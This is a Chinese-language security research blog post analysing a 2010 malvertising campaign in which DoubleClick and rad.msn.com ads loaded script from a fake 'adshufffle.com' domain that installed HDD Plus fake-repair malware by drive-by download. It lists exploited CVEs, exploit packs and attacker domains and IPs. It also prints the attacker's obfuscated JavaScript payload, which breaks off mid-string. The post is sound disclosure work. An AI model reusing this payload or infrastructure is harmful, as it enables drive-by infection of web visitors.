<a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=Sq5E4EDlQPM:AjrmoEQu5tE:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=Sq5E4EDlQPM:AjrmoEQu5tE:63t7Ie-LG7Y"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=63t7Ie-LG7Y" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=Sq5E4EDlQPM:AjrmoEQu5tE:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?i=Sq5E4EDlQPM:AjrmoEQu5tE:V_sGLiPBpWU" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/blogspot/armorize_cht/~4/Sq5E4EDlQPM" height="1" width="1"/>Chrishttp://www.blogger.com/profile/01653790213029148763noreply@blogger.com2http://armorize-cht.blogspot.com/2010/12/hdd-plusopenx.htmltag:blogger.com,1999:blog-1441759431140700676.post-11287628238787001732010-12-14T16:41:00.015+08:002010-12-16T00:06:20.883+08:002010-12-16T00:06:20.883+08:00Google及Microsoft的兩大廣告平台遭掛馬利用散播惡意軟件(作者: Chris Hsiao, NightCola Lin, Wayne Huang, Caleb Sima, Fyodor Yarochkin)<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_hELDi5B8zOI/TQLgAzik5fI/AAAAAAAACI4/weE2v8WJxu4/s1600/HDD_PLUS_1.png"><img id="BLOGGER_PHOTO_ID_5549243995313726962" style="DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 748px; CURSOR: hand; TEXT-ALIGN: center" alt="" src="http://4.bp.blogspot.com/_hELDi5B8zOI/TQLgAzik5fI/AAAAAAAACI4/weE2v8WJxu4/s1600/HDD_PLUS_1.png" border="0" /></a><br /><br />前些日子以來,我們看到了很多人感染HDD-plus這個惡意軟件,當受害者的電腦被安裝了此一軟件後,會讓受害者的電腦無法順利使用,並會看到一連串系統發生錯誤的訊息,然後要求你花錢購買它來修復這些問題。<br /><br />更多有關HDD Plus惡意軟件的相關訊息<a href="http://www.bleepingcomputer.com/virus-removal/remove-hdd-plus">這裡</a> 還有 <a href="http://www.myantispyware.com/2010/12/09/how-to-remove-hdd-plus-and-hddplus/">這裡</a>。<br /><br />我們查覺到這個HDD Plus惡意軟件其中的一個主要散播管道是透過惡意廣告利用Drive-by Download,在DoubleClick(Google)及rad.msn.com(Microsoft)這兩個網路上最大的廣告平台上進行散播的。<br /><br />技術細節報告:<br /><br /><b>概要</b><br /><br /><b>行為描述:</b> 當使用者瀏覽一個含有來自DoubleClick或rad.msn.com的廣告時,會載入一段從ADShufffle.com(注意,這邊有3個f)產生出來的惡意javascript,然後開始drive-by download的程序,一旦成功這個HDD Plus及其它的惡意軟件將會安裝至受害者的電腦中,使用者不用點擊只是簡單的看到這個網頁就被感染。<br /><br /><b>已知受影響的網站:</b><br />含有DoubleClick或rad.msn.com廣告的網站,其中包括如<b>Scout.com</b>(使用DoubleClick)、<b>realestate.msn.com</b>、<b>msnbc.com</b>(兩個都有使用)以及<b>mail.live.com</b>等等。<b>除此之外,我們相信還有更多的廣告交換平台,都可能曾經發出過這個假ADShufffle的惡意廣告。</b><br /><br /><br /><b>重要的日期:</b><br /><br /><b>12月2日:</b>駭客註冊相關的惡意網域<br /><br /><b>12月3日:</b>HackAlert第一次偵測到DoubleClick含有惡意廣告的時間為(2010-12-04T02:18:50+00:00GMT)。由於HackAlert每天所偵測到的惡意網頁數量相當大,所以我們當下並沒馬上注意到它。<br /><br /><b>12月8日:</b>我們接獲到合作夥伴<a href="https://blogs.verisign.com/ssl-blog/2010/08/network_solutions_malcode_widg.php">Symantec-VeriSign</a>的請求,要我們分析一些因為被HackAlert偵測為惡意進而導致其信任標章被移除的網站。其中部分網站客戶聯繫賽門鐵克要求獲得更多訊息。HackAlert在標示異常網站時,造成客戶網站的VeriSign信任標章時有時無的狀況,客戶也質疑可能是我們的Hackalert系統有瑕疵存在,因此引起我們的關注。Symantec-VeriSign 在所有具有信任標章的客戶網站上進行掃描,以檢測網站是否受到感染,而且對於掃描的品質,不論是精準度和覆蓋率都非常慎重,我們一直致力於讓他們成為我們滿意的合作夥伴。<br /><br />就在同一天,我們證實這是來自DoubleClick的廣告,並同時回報給Symantec-VeriSign。<br />也在同一天,我們發現DoubleClick的這個惡意廣告可能是由Adshuffle所提供的,我們隨即通知Adshuffle的President Andrea McKee。她很快就回應了我們,並希望我們能提供更多的相關資訊給她。後來她很快的指出這是三個f的(adshufffle),所以這不是他們公司。她並提到很感激這些詳細的資訊,並表示她將很快地來通知DoubleClick。<br /><br /><b>12月9日:</b>我們接觸到了DoubleClick,在很短的幾個小時內,他們安排了一個與他們的anti-malvertising及事件處理小組的會議。我們對於DoubleClick如此迅速的行動力驚訝及印象深刻。我們提供了相關細節內容,而DoubleClick說他們已經完全掌控此事件的來龍去脈。<br /><br />在那同時我們的CEO Caleb Sima收到一封私人的信件,信中指出mail.live.msn及其他的一些大型的網站透過惡意廣告進行drive-by downloads的事件發生。我們隨即調查其它的廣告交換網路,因為這個<b>ADShufffle.com是可以欺騙多個廣告交換網路,來插入他們的惡意javascript</b>。於是我們開始著手進行調查。<br /><br /><b>12月10日:</b>一個私人的消息來源,提供了詳細的細節資訊給我們,我們確認了ADShufffle.com的惡意廣告也透過rad.msn.com來散播。<br /><br /><b>使用的Exploits:</b><br /><br />最初的DoubleClick:<br />1) Internet Explorer iepeers (<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0806">CVE-2010-0806</a>)<br /><br />之後的DoubleClick及rad.msn.com:<br />2) JDT: Java Web Start Arbitrary command-line injection (<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0886">CVE-2010-0886</a>)<br />3) Adobe Reader and Adobe Acrobat 9 GetIcon (<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927">CVE-2009-0927</a>)<br />4) Microsoft MDAC RDS.Dataspace ActiveX (<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0003">CVE-2006-0003</a>)<br />5) Adobe Reader and Acrobat 9.x Doc.media.newPlayer (<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4324"></a>)<br />6) Adobe Acrobat and Reader util.printf <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-2992">(CVE-2008-2992)</a><br />7) Adobe Reader GetMailInfo (<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2007-5659">CVE-2007-5659</a>)<br /><br /><b>安裝的惡意程式:</b><br />過去的一個星期以來,ADShufffle所散播的惡意程式是一直變來變去的,除了HDD Plus以外,也同時包括了其它的惡意程式如一些後門等等。之後會在這篇blog裡提供這些惡意程式的檔案來給有興趣的人分析。<br /><br /><b>使用的Exploit packs</b><br />主要是使用疑似Eleonore修改過的版本。而Neosploit也有被使用,在neosploit中惡意程式在被散播前都會被動態的加殼以避免被防毒軟體偵測到。<br /><br /><b>重要的事實:</b><br />1. 透過惡意廣告進行Drive-by download,參訪者完全不用點擊就中奬。<br />2. 透過世上最大的廣告平台進行散播,一些最大型的網站也都受到影響。<br />3. Exploits混碼的手工相當精良。<br />4. 最初的防毒軟體偵測率非常之低。<br />5. 在寫這篇blog的同時,這個ADShufffle.com仍然透過他們所註冊在進行drive-by downloads。事實上,今天他們已經註冊更多的網域了。<br /><br /><b>相關網域及IPs</b><br /><br />adshufffle.com (63.247.64.174) (含有能產生iframe並指到惡意的exploit的javascript)<br />acerdse.com, blindry.com, careepi.com, colemuns.com (91.213.217.194) (含有exploits及惡意程式)<br />ssmmbb.com (91.213.217.193) (含有Java jar exploit)<br />feudari.com (91.213.217.192) (含有pdf exploit)<br />searchjewel.org (91.200.242.17) (含有惡意程式)<br />195.5.161.10 (含有Java jar exploit)<br />thjlnqbtgdw.com, pbcplifpgdw.com (174.132.254.18) (含有exploits及惡意程式)<br /><span class="fullpost">續前文<br /><br /><b>攻擊細節</b><br /><br /><center><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_hELDi5B8zOI/TQLzz0AotPI/AAAAAAAACJA/OGd_y4Z1qwI/s1600/doubleclick_hdd_plus_adshufffle_illu.png"><img id="BLOGGER_PHOTO_ID_5549265762334061810" style="DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 748px; CURSOR: hand; TEXT-ALIGN: center" alt="" src="http://4.bp.blogspot.com/_hELDi5B8zOI/TQLzz0AotPI/AAAAAAAACJA/OGd_y4Z1qwI/s1600/doubleclick_hdd_plus_adshufffle_illu.png" border="0" /></a><br />圖解說明 1--DoubleClick ADShufffle drive-by download malvertising<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_hELDi5B8zOI/TQLz0FY7NgI/AAAAAAAACJI/KsAHLnLbAB0/s1600/rad_msn_com_hdd_plus_adshufffle_illu.png"><img id="BLOGGER_PHOTO_ID_5549265766999340546" style="DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 748px; CURSOR: hand; TEXT-ALIGN: center" alt="" src="http://4.bp.blogspot.com/_hELDi5B8zOI/TQLz0FY7NgI/AAAAAAAACJI/KsAHLnLbAB0/s1600/rad_msn_com_hdd_plus_adshufffle_illu.png" border="0" /></a><br />圖解說明 2--rad.msn.com ADShufffle drive-by download malvertising</center><br /><br /><b>第一部份--DoubleClick個案研究</b><br /><br />首先我們先來看看DoubleClick的這個案例,我們先來瀏覽一個含有DoubleClick廣告的網站,例如Scout.com這個網站,我們可以看到HTML裡面含有一個大小為728x90的DoubleClick廣告標籤 :<br /><pre class="brush: html;"><br /><SCRIPT LANGUAGE="JavaScript"><br /><br /><!-- hide from non-JavaScript browsers<br /><br />document.writeln('<SCRIPT LANGUAGE="JavaScript" SRC="http://ad.doubleclick.net/adj/organicgardening/home;kw=;slot=728x90.1;topic=home;sbtpc=home;tile=1;dcopt=ist;sz=728x90;ord=' + ord + '?" type="text/javascript">');<br /><br />document.writeln('</SCRIPT>');<br /><br />// end hide from browsers --><br /><br /></SCRIPT><br /><br /><noscript><a href="http://ad.doubleclick.net/jump/organicgardening/home;kw=;slot=728x90.1;topic=home;sbtpc=home;tile=1;sz=728x90;ord=123456?" target="_blank"><img src="http://ad.doubleclick.net/ad/organicgardening/home;topic=home;sbtpc=home;tile=1;sz=728x90;ord=123456?" width="728" height="90" border="0" alt="" target="_blank"></a></noscript><br /><br /></pre><br />試著去載入它時 瀏覽會連到ad.doubleclick.net,然後得到以下連結<br /><pre class="brush: js;"><br />document.write('<script type=\"text/javascript\" src=\"http://this.content.served.by.adshufffle.com/p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d4_D7mmLupb1TWfhr91mfhH0/view.js/?sid=1953243&lpd=${4020322}&ASTPCT=${http://ad.doubleclick.net/click%3Bh%3Dv8/3a6a/3/0/%2a/w%3B233305186%3B0-0%3B0%3B12910146%3B3454-728/90%3B39673254/39691041/1%3B%3B%7Eaopt%3D2/1/7d/1%3B%7Esscs%3D%3f}\"><\/script>');document.write('\n<!-- Begin Interstitial Ad -->');<br /><br />//PopUnder Power<br /><br />//Credit notice must stay intact for use.<br /><br />... script continues...<br /><br /></pre><br />然後會得到來自adshufffle.com的一段javascript:<br /><pre class="brush: js;"><br />var latency='';<br /><br />var reno1='%78%53%4C%';<br /><br />var reno2='78%53%4C%78%53%4C%53';<br /><br />var reno3='%25%4C%4A%63%4C%43%25%4C%57%25';<br /><br />var reno4='%4C%6D%63%';<br /><br />var reno5='4C%48';<br /><br />var reno6='%32%4';<br /><br />var reno7='C%42%32%4C%50%32%4C%25%57%4C%32%32%4C%43';<br /><br />var reno8='%32%4C%5F%25%4C%4F%6';<br /><br />var reno9='3%4C%6D%63%4C%25%25%4C%53%63%4C%25%25%4C%42%63%4C%';<br /><br />var reno10='25%57%4C%48%32%4C%70%32%4C%25%';<br /><br />var reno11='57%4C%5F%32%4C%25%32%4C%48%32%4C%42%32%4';<br /><br />var reno12='C%50%32%4C%25%57%4C%';<br /><br />var reno13='32%32%4C%53%25%4C%25';<br /><br />var reno14='%25%4C%53%63%4C%25%25%4C%42%63%4C%48%32%4C%63%32%4';<br /><br />var reno15='C%50%32%4C%53%57%4C%63%57%4C%35%32%4C%53%25%4C%25%';<br /><br />var reno16='25%4C%5F%32%4C%6D%32%4C%25%25%4C%42%63%4C%57%32%4C%6D%32%4C%43%32%4C%4F%32%4C%4F';<br /><br />var reno17='%32%4C%5F%32%4C%25%5';<br /><br />var reno18='7%4C%63%32%4C%63%57%4C%53%25%4C%25%25%4C%53%63%4C%';<br /><br />var reno19='43%63%4C%25%25%4C%42%63%4C%70%57%4C%35%32%4C%57%32';<br /><br />var reno20='%4C%43%32%4C%48%32%4C%35%32%4C%53%25%4C%25%25%4C%3';<br /><br />var reno21='5%63%4C%25%63%4C%57%63%4C%25%25%4C%42%63%4C%35%32%4C%70%57%4C%70%32%4C%43%32%4C%57%57%4C%53%25%4C%25%25%4C%50%63%4C%43%63%4C%48%63%4C%50%63%4C%32%63%4C%53%63%4C%70%63%4C%50%63%4C%70%70%4C%63%63%4C%48%25%4C%48%32%4C%70%32%4C%5F%32%4C%6D%32%4C%32%70%4C%63%63%4C%48%25%4C%25%32%4C%32%70%4C%25%63%4C%48%25%4C%63%57%4C%70%32%4C%25%57%4C%50%32%4C%63%70%4C%70%57%4C%32%32%4C%43%32%4C%57%70%4C%32%70%4C%25%63%4C%48%25%4C%42%32%4C%5F%32%4C%63%32%4C%6D%25%4C%70%57%4C%48%32%4C%57%32%4C%25%57%4C%50%32%4C%70%57%4C%6D%25%4C%57%57%4C%57%57%4C%57%57%4C%32%70%4C%25%63%4C%48%25%4C%32%70%4C%25%63%4C%48%25%4C%50%70%4C%63%63%4C%48%25%4C%53%57%4C%70%57%4C%70%57%4C%35%32%4C%5F%63%4C%42%63%4C%63%57%4C%63%32%4C%63%57%4C%63%57%4C%6D%57%4C%4A%63%4C%50%63%4C%5F%25%4C%70%32%4C%57%63%4C%5F%25%4C%50%63%4C%5F%25%4C%25%63%4C%42%63%4C%70%57%4C%53%57%4C%5F%32%4C%50%32%4C%6D%57%4C%4A%63%4C%4A%63%4C%50%63%4C%5F%25%4C%50%63%4C%70%63%4C%53%63%4C%50%63%4C%43%63%4C%32%63%4C%43%63%4C%63%63%4C%5F%25%4C%70%63%4C%48%63%4C%25%63%4C%63%63%4C%57%63%4C%32%63%4C%43%63%4C%63%63%4C%4A%63%4C%53%63%4C%43%63%4C%5F%25%4C%35%63%4C%25%63%4C%57%63%4C%42%25%4C%70%63%4C%48%63%4C%70%63%4C%63%63%4C%4A%63%4C%32%63%4C%70%63%4C%50%63%4C%53%63%4C%50%63%4C%43%63%4C%25%63%4C%50%63%4C%4A%63%4C%53%63%4C%4A%63%4C%53%63%4C%42%25%4C%53%63%4C%4A%63%4C%32%63%4C%35%63%4C%50%63%4C%48%63%4C%53%63%4C%63%63%4C%63%63%4C%63%63%4C%25%63%4C%4A%63%4C%57%57%4C%5F%25%4C%78%25%4C%5F%25%4C%53%63%4C%5F%25%4C%63%63%4C%5F%25%4C%50%32%4C%32%63%4C%50%32%4C%63%63%4C%5F%25%4C%35%63%4C%32%57%4C%42%63%4C%35%32%4C%4A%63%4C%4A%32%4C%63%32%4C%43%32%4C%4F%32%4C%63%32%4C%5F%25%4C%70%57%4C%48%32%4C%6D%32%4C%6D%25%4C%4A%32%4C%63%32%4C%43%32%4C%4F%32%4C%63%32%4C%48%32%4C%4F%32%4C%25%32%4C%48%57%4C%5F%32%4C%70%32%4C%6D%25%4C%70%32%4C%50%32%4C%5F%25%4C%5F%25%4C%78%63%4C%53%57%4C%70%57%4C%70%57%4C%35%32%4C%42%63%4C%4F%32%4C%25%57%4C%48%57%4C%32%25%4C%53%63%4C%43%63%4C%42%63%4C%35%32%4C%32%25%4C%35%63%4C%25%63%4C%57%63%4C%42%63%4C%57%57%4C%32%25%4C%32%32%4C%57%57%4C%63%57%4C%6D%25%4C%53%63%4C%43%63%4C%35%57%4C%35%63%4C%25%63%4C%57%63%4C%5F%48%4C%70%32%4C%25%57%4C%50%32%4C%63%70%4C%70%57%4C%32%32%4C%43%32%4C%57%70%4C%43%57%4C%50%32%4C%70%32%4C%43%32%4C%4F%32%4C%5F%32%4C%35%70%4C%53%63%4C%50%63%4C%5F%25%4C%70%32%4C%25%57%4C%50%32%4C%63%32%4C%25%57%4C%32%32%4C%43%32%4C%57%32%4C%5F%48%4C%70%57%4C%48%32%4C%57%32%4C%25%57%4C%50%32%4C%70%57%4C%5F%25%4C%48%32%4C%63%32%4C%25%57%4C%48%32%4C%42%32%4C%42%32%4C%5F%32%4C%63%70%4C%57%32%4C%43%32%4C%25%70%4C%50%32%4C%5F%25%4C%25%32%4C%70%32%4C%25%32%4C%5F%25%4C%42%32%4C%5F%32%4C%63%32%4C%6D%25%4C%48%32%4C%4F%32%4C%32%32%4C%32%32%4C%32%32%4C%48%57%4C%35%32%4C%63%57%4C%70%32%4C%50%32%4C%6D%25%4C%43%57%4C%25%32%4C%6D%25%4C%70%32%4C%48%32%4C%32%57%4C%25%57%4C%48%32%4C%63%57%4C%6D%25%4C%70%57%4C%6D%32%4C%48%32%4C%70%57%4C%6D%32%4C%5F%32%4C%63%32%4C%6D%25%4C%63%57%4C%43%32%4C%35%32%4C%70%57%4C%5F%25%4C%5F%25%4C%78%63%4C%53%57%4C%70%57%4C%70%57%4C%35%32%4C%42%63%4C%63%32%4C%25%57%4C%63%57%4C%5F%63%4C%53%57%4C%35%32%4C%53%57%4C%6D%25%4C%25%57%4C%48%32%4C%70%32%4C%50%32%4C%5F%32%4C%4F%32%4C%42%25%4C%35%32%4C%63%57%4C%50%32%4C%4F%32%4C%32%32%4C%5F%25%4C%63%57%4C%25%57%4C%48%32%4C%6D%32%4C%6D%32%4C%50%32%4C%25%32%4C%5F%25%4C%42%32%4C%5F%32%4C%63%32%4C%6D%25%4C%48%32%4C%4F%32%4C%32%32%4C%32%32%4C%32%32%4C%48%57%4C%35%32%4C%63%57%4C%70%32%4C%50%32%4C%6D%25%4C%43%57%4C%25%32%4C%6D%25%4C%70%32%4C%48%32%4C%32%57%4C%25%57%4C%48%32%4C%63%57%4C%6D%25%4C%70%57%4C%6D%32%4C%48%32%4C%70%57%4C%6D%32%4C%5F%32%4C%63%32%4C%6D%25%4C%63%57%4C%43%32%4C%35%32%4C%70%57%4C%5F%25%4C%5F%25%4C%78%63%4C%53%57%4C%70%57%4C%70%57%4C%35%32%4C%25%25%4C%42%63%4C%63%32%4C%25%57%4C%63%57%4C%53%25%4C%48%32%4C%42%32%4C%50%32%4C%25%57%4C%32%32%4C%43%32%4C%4F%63%4C%57%25%4C%35%25%4C%48%32%4C%70%57%4C%43%32%4C%25%57%4C%57%57%4C%6D%25%4C%70%57%4C%6D%32%4C%48%32%4C%42%32%4C%48%57%4C%63%32%4C%5F%32%4C%70%32%4C%78%53%4C%78%53%4C%42%57%4C%78%53%4C%78%53%4C%78%53%4C%4A%63%4C%43%25%4C%43%25%4C%25%25%4C%48%70%4C%63%63%4C%48%25%4C%48%32%4C%42%32%4C%50%32%4C%25%57%4C%32%32%4C%43%32%4C%5F%25%4C%63%70%4C%63%63%4C%48%25%4C%48%70%4C%63%63%4C%48%25%4C%53%25%4C%57%25%4C%50%63%4C%57%25%4C%42%63%4C%70%57%4C%35%32%4C%57%32%4C%43%32%4C%48%32%4C%35%32%4C%53%25%4C%57%25%4C%50%63%4C%57%25%4C%42%63%4C%35%32%4C%70%57%4C%70%32%4C%43%32%4C%57%57%4C%53%25%4C%57%25%4C%4A%63%4C%6D%32%4C%48%32%4C%70%32%4C%70%32%4C%43%32%4C%35%32%4C%78%63%4C%43%57%4C%70%57%4C%43%32%4C%4F%32%4C%43%32%4C%25%32%4C%43%32%4C%63%57%4C%43%32%4C%32%57%4C%57%25%4C%42%63%4C%48%32%4C%4F%32%4C%43%57%4C%70%57%4C%63%57%4C%53%25%4C%57%25%4C%63%63%4C%70%63%4C%25%63%4C%63%63%4C%48%63%4C%43%63%4C%50%63%4C%42%63%4C%70%32%4C%43%32%4C%5F%63%4C%53%57%4C%35%32%4C%53%57%4C%6D%25%4C%48%32%4C%5F%48%4C%63%57%4C%78%32%4C%5F%48%4C%63%57%4C%70%57%4C%50%32%4C%70%57%4C%63%57%4C%5F%25%4C%42%32%4C%5F%32%4C%63%32%4C%6D%25%4C%48%32%4C%4F%32%4C%32%32%4C%32%32%4C%32%32%4C%48%57%4C%35%32%4C%63%57%4C%70%32%4C%50%32%4C%6D%25%4C%43%57%4C%25%32%4C%6D%25%4C%70%32%4C%48%32%4C%32%57%4C%25%57%4C%48%32%4C%63%57%4C%6D%25%4C%70%57%4C%6D%32%4C%48%32%4C%70%57%4C%6D%32%4C%5F%32%4C%63%32%4C%6D%25%4C%63%57%4C%43%32%4C%35%32%4C%70%57%4C%5F%25%4C%5F%25%4C%78%63%4C%53%57%4C%70%57%4C%70%57%4C%35%32%4C%57%25%4C%42%63%4C%63%32%4C%25%57%4C%63%57%4C%53%25%4C%48%32%4C%42%32%4C%50%32%4C%25%57%4C%32%32%4C%43%32%4C%63%70%4C%63%63%4C%48%25%4C%25%25%4C%35%25%4C%48%32%4C%53%57%4C%50%32%4C%63%32%4C%63%57%4C%48%32%4C%6D%32%4C%48%57%4C%35%25%4C%48%32%4C%70%57%4C%43%32%4C%25%57%4C%57%57%4C%6D%25%4C%70%57%4C%6D%32%4C%48%32%4C%42%32%4C%48%57%4C%63%32%4C%5F%32%4C%70%32%4C%78%53%4C%78%53%4C%53%25%4C%4A%63%4C%43%25%4C%43%25%4C%25%25%4C%48%70%4C%63%63%4C%48%25%4C%48%32%4C%42%32%4C%50%32%4C%25%57%4C%32%32%4C%43%32%4C%5F%25%4C%63%70%4C%63%63%4C%48%25%4C%48%70%4C%63%63%4C%48%25%4C%53%25%4C%57%25%4C%50%63%4C%57%25%4C%42%63%4C%70%57%4C%35%32%4C%57%32%4C%43%32%4C%48%32%4C%35%32%4C%53%25%4C%57%25%4C%50%63%4C%57%25%4C%42%63%4C%35%32%4C%70%57%4C%70%32%4C%43%32%4C%57%57%4C%53%25%4C%57%25%4C%4A%63%4C%6D%32%4C%48%32%4C%70%32%4C%70%32%4C%43%32%4C%35%32%4C%78%63%4C%43%57%4C%70%57%4C%43%32%4C%4F%32%4C%43%32%4C%25%32%4C%43%32%4C%63%57%4C%43%32%4C%32%57%4C%57%25%4C%42%63%4C%48%32%4C%4F%32%4C%43%57%4C%70%57%4C%63%57%4C%53%25%4C%57%25%4C%70%57%4C%5F%32%4C%5F%32%4C%25%57%4C%42%63%4C%48%57%4C%32%25%4C%70%32%4C%32%63%4C%32%32%4C%50%63%4C%50%63%4C%35%63%4C%57%63%4C%48%63%4C%70%63%4C%57%63%4C%43%63%4C%63%63%4C%70%32%4C%57%63%4C%70%32%4C%43%63%4C%35%63%4C%63%32%4C%63%63%4C%25%32%4C%70%32%4C%63%32%4C%63%63%4C%48%63%4C%48%63%4C%53%63%4C%70%32%4C%63%63%4C%43%63%4C%48%32%4C%25%63%4C%43%63%4C%42%63%4C%43%57%4C%48%32%4C%4A%32%4C%5F%63%4C%53%57%4C%35%32%4C%53%57%4C%6D%25%4C%57%57%4C%5F%32%4C%35%32%4C%63%57%4C%5F%25%4C%57%32%4C%48%32%4C%63%57%4C%53%57%4C%48%57%4C%53%57%4C%5F%25%4C%42%32%4C%5F%32%4C%63%32%4C%6D%25%4C%63%57%4C%6D%32%4C%48%57%4C%42%32%4C%48%32%4C%4F%32%4C%5F%32%4C%63%32%4C%5F%25%4C%5F%25%4C%78%63%4C%53%57%4C%70%57%4C%70%57%4C%35%32%4C%57%25%4C%42%63%4C%63%32%4C%25%57%4C%63%57%4C%53%25%4C%48%32%4C%42%32%4C%50%32%4C%25%57%4C%32%32%4C%43%32%4C%63%70%4C%63%63%4C%48%25%4C%25%25%4C%35%25%4C%48%32%4C%53%57%4C%50%32%4C%63%32%4C%63%57%4C%48%32%4C%6D%32%4C%48%57%4C%35%25%4C%48%32%4C%70%57%4C%43%32%4C%25%57%4C%57%57%4C%6D%25%4C%70%57%4C%6D%32%4C%48%32%4C%42%32%4C%48%57%4C%63%32%4C%5F%32%4C%70%32%4C%78%53%4C%43%53%4C%43%53%4C%78%53%4C%78%53%4C%4A%57%4C%53%25%4C%53%25%4C%48%32%4C%63%57%4C%4F%32%4C%48%32%4C%53%25%4C%53%25%4C%42%57%4C%78%53%4C%4A%63%4C%43%25%4C%43%25%4C%25%25%4C%48%70%4C%63%63%4C%48%25%4C%48%32%4C%42%32%4C%50%32%4C%25%57%4C%32%32%4C%43%32%4C%5F%25%4C%63%70%4C%63%63%4C%48%25%4C%48%70%4C%63%63%4C%48%25%4C%53%25%4C%53%25%4C%57%25%4C%53%63%4C%57%25%4C%42%63%4C%70%57%4C%35%32%4C%57%32%4C%43%32%4C%48%32%4C%35%32%4C%53%25%4C%57%25%4C%53%63%4C%57%25%4C%42%63%4C%35%32%4C%70%57%4C%70%32%4C%43%32%4C%57%57%4C%53%25%4C%57%25%4C%4A%63%4C%6D%32%4C%48%32%4C%70%32%4C%70%32%4C%43%32%4C%35%32%4C%78%63%4C%43%57%4C%70%57%4C%43%32%4C%4F%32%4C%43%32%4C%25%32%4C%43%32%4C%63%57%4C%43%32%4C%32%57%4C%57%25%4C%42%63%4C%48%32%4C%4F%32%4C%43%57%4C%70%57%4C%63%57%4C%53%25%4C%57%25%4C%50%63%4C%42%63%4C%48%32%4C%32%25%4C%53%63%4C%42%63%4C%63%57%4C%32%25%4C%63%63%4C%70%63%4C%25%63%4C%63%63%4C%48%63%4C%43%63%4C%50%63%4C%42%63%4C%70%32%4C%43%32%4C%5F%63%4C%53%57%4C%35%32%4C%53%57%4C%6D%25%4C%70%57%4C%5F%48%4C%63%57%4C%70%57%4C%50%32%4C%70%57%4C%63%57%4C%5F%25%4C%42%32%4C%5F%32%4C%63%32%4C%6D%25%4C%48%32%4C%4F%32%4C%32%32%4C%32%32%4C%32%32%4C%48%57%4C%35%32%4C%63%57%4C%70%32%4C%50%32%4C%6D%25%4C%43%57%4C%25%32%4C%6D%25%4C%70%32%4C%48%32%4C%32%57%4C%25%57%4C%48%32%4C%63%57%4C%6D%25%4C%70%57%4C%6D%32%4C%48%32%4C%70%57%4C%6D%32%4C%5F%32%4C%63%32%4C%6D%25%4C%63%57%4C%43%32%4C%35%32%4C%70%57%4C%5F%25%4C%5F%25%4C%78%63%4C%53%57%4C%70%57%4C%70%57%4C%35%32%4C%57%25%4C%42%63%4C%63%32%4C%25%57%4C%63%57%4C%53%25%4C%48%32%4C%42%32%4C%50%32%4C%25%57%4C%32%32%4C%43%32%4C%63%70%4C%63%63%4C%48%25%4C%25%25%4C%35%25%4C%48%32%4C%53%57%4C%50%32%4C%63%32%4C%63%57%4C%48%32%4C%6D%32%4C%48%57%4C%35%25%4C%48%32%4C%70%57%4C%43%32%4C%25%57%4C%57%57%4C%6D%25%4C%70%57%4C%6D%32%4C%48%32%4C%42%32%4C%48%57%4C%63%32%4C%5F%32%4C%70%32%4C%78%53%4C%4A%57%4C%53%25%4C%43%25%4C%53%25%4C%4F%32%4C%4F%32%4C%48%57%4C%6D%32%4C%53%25%4C%42%63%4C%50%25%4C%53%25%4C%35%32%4C%63%32%4C%70%57%4C%42%32%4C%53%25%4C%35%25%4C%53%25%4C%32%32%4C%43%32%4C%78%53%4C%78%53%4C%78%53%4C%78%53%4C%4A%63%4C%43%25%4C%4F%32%4C%42%32%4C%70%57%4C%63%32%4C%43%32%4C%70%57%4C%50%32%4C%70%57%4C%63%57%4C%35%25%4C%35%32%4C%63%32%4C%70%57%4C%50%32%4C%42%32%4C%6D%25%4C%70%57%4C%5F%48%4C%4F%32%4C%4F%32%4C%50%32%4C%53%25%4C%42%63%4C%53%25%4C%35%32%4C%63%32%4C%70%57%4C%42%32%4C%53%25%4C%25%57%4C%50%32%4C%32%57%4C%78%53%4C%4A%63%4C%25%25%4C%25%25%4C%53%25%4C%42%63%4C%53%25%4C%70%57%4C%5F%48%4C%4F%32%4C%4F%32%4C%50%32%4C%53%25%4C%25%57%4C%50%32%4C%32%57%4C%78%53%4C%78%53%4C%4A%63%4C%43%25%4C%53%63%4C%32%63%4C%53%25%4C%78%25%4C%53%25%4C%53%63%4C%32%63%4C%53%25%4C%78%25%4C%53%25%4C%53%63%4C%53%63%4C%53%63%4C%50%63%4C%35%25%4C%53%25%4C%5F%25%4C%53%25%4C%43%25%4C%43%25%4C%43%25%4C%50%63%4C%42%25%4C%43%25%4C%25%25%4C%53%25%4C%25%25%4C%35%25%4C%32%32%4C%5F%70%4C%35%57%4C%48%32%4C%70%32%4C%6D%32%4C%43%70%4C%70%57%4C%63%57%4C%50%32%4C%4F%32%4C%6D%25%4C%43%25%4C%35%25%4C%57%32%4C%6D%32%4C%43%32%4C%25%57%4C%70%57%4C%63%48%4C%70%48%4C%42%70%4C%57%70%4C%5F%32%4C%70%57%4C%6D%25%4C%43%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%50%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%43%25%4C%35%25%4C%25%57%4C%50%32%4C%48%32%4C%43%48%4C%4F%32%4C%4F%32%4C%48%57%4C%32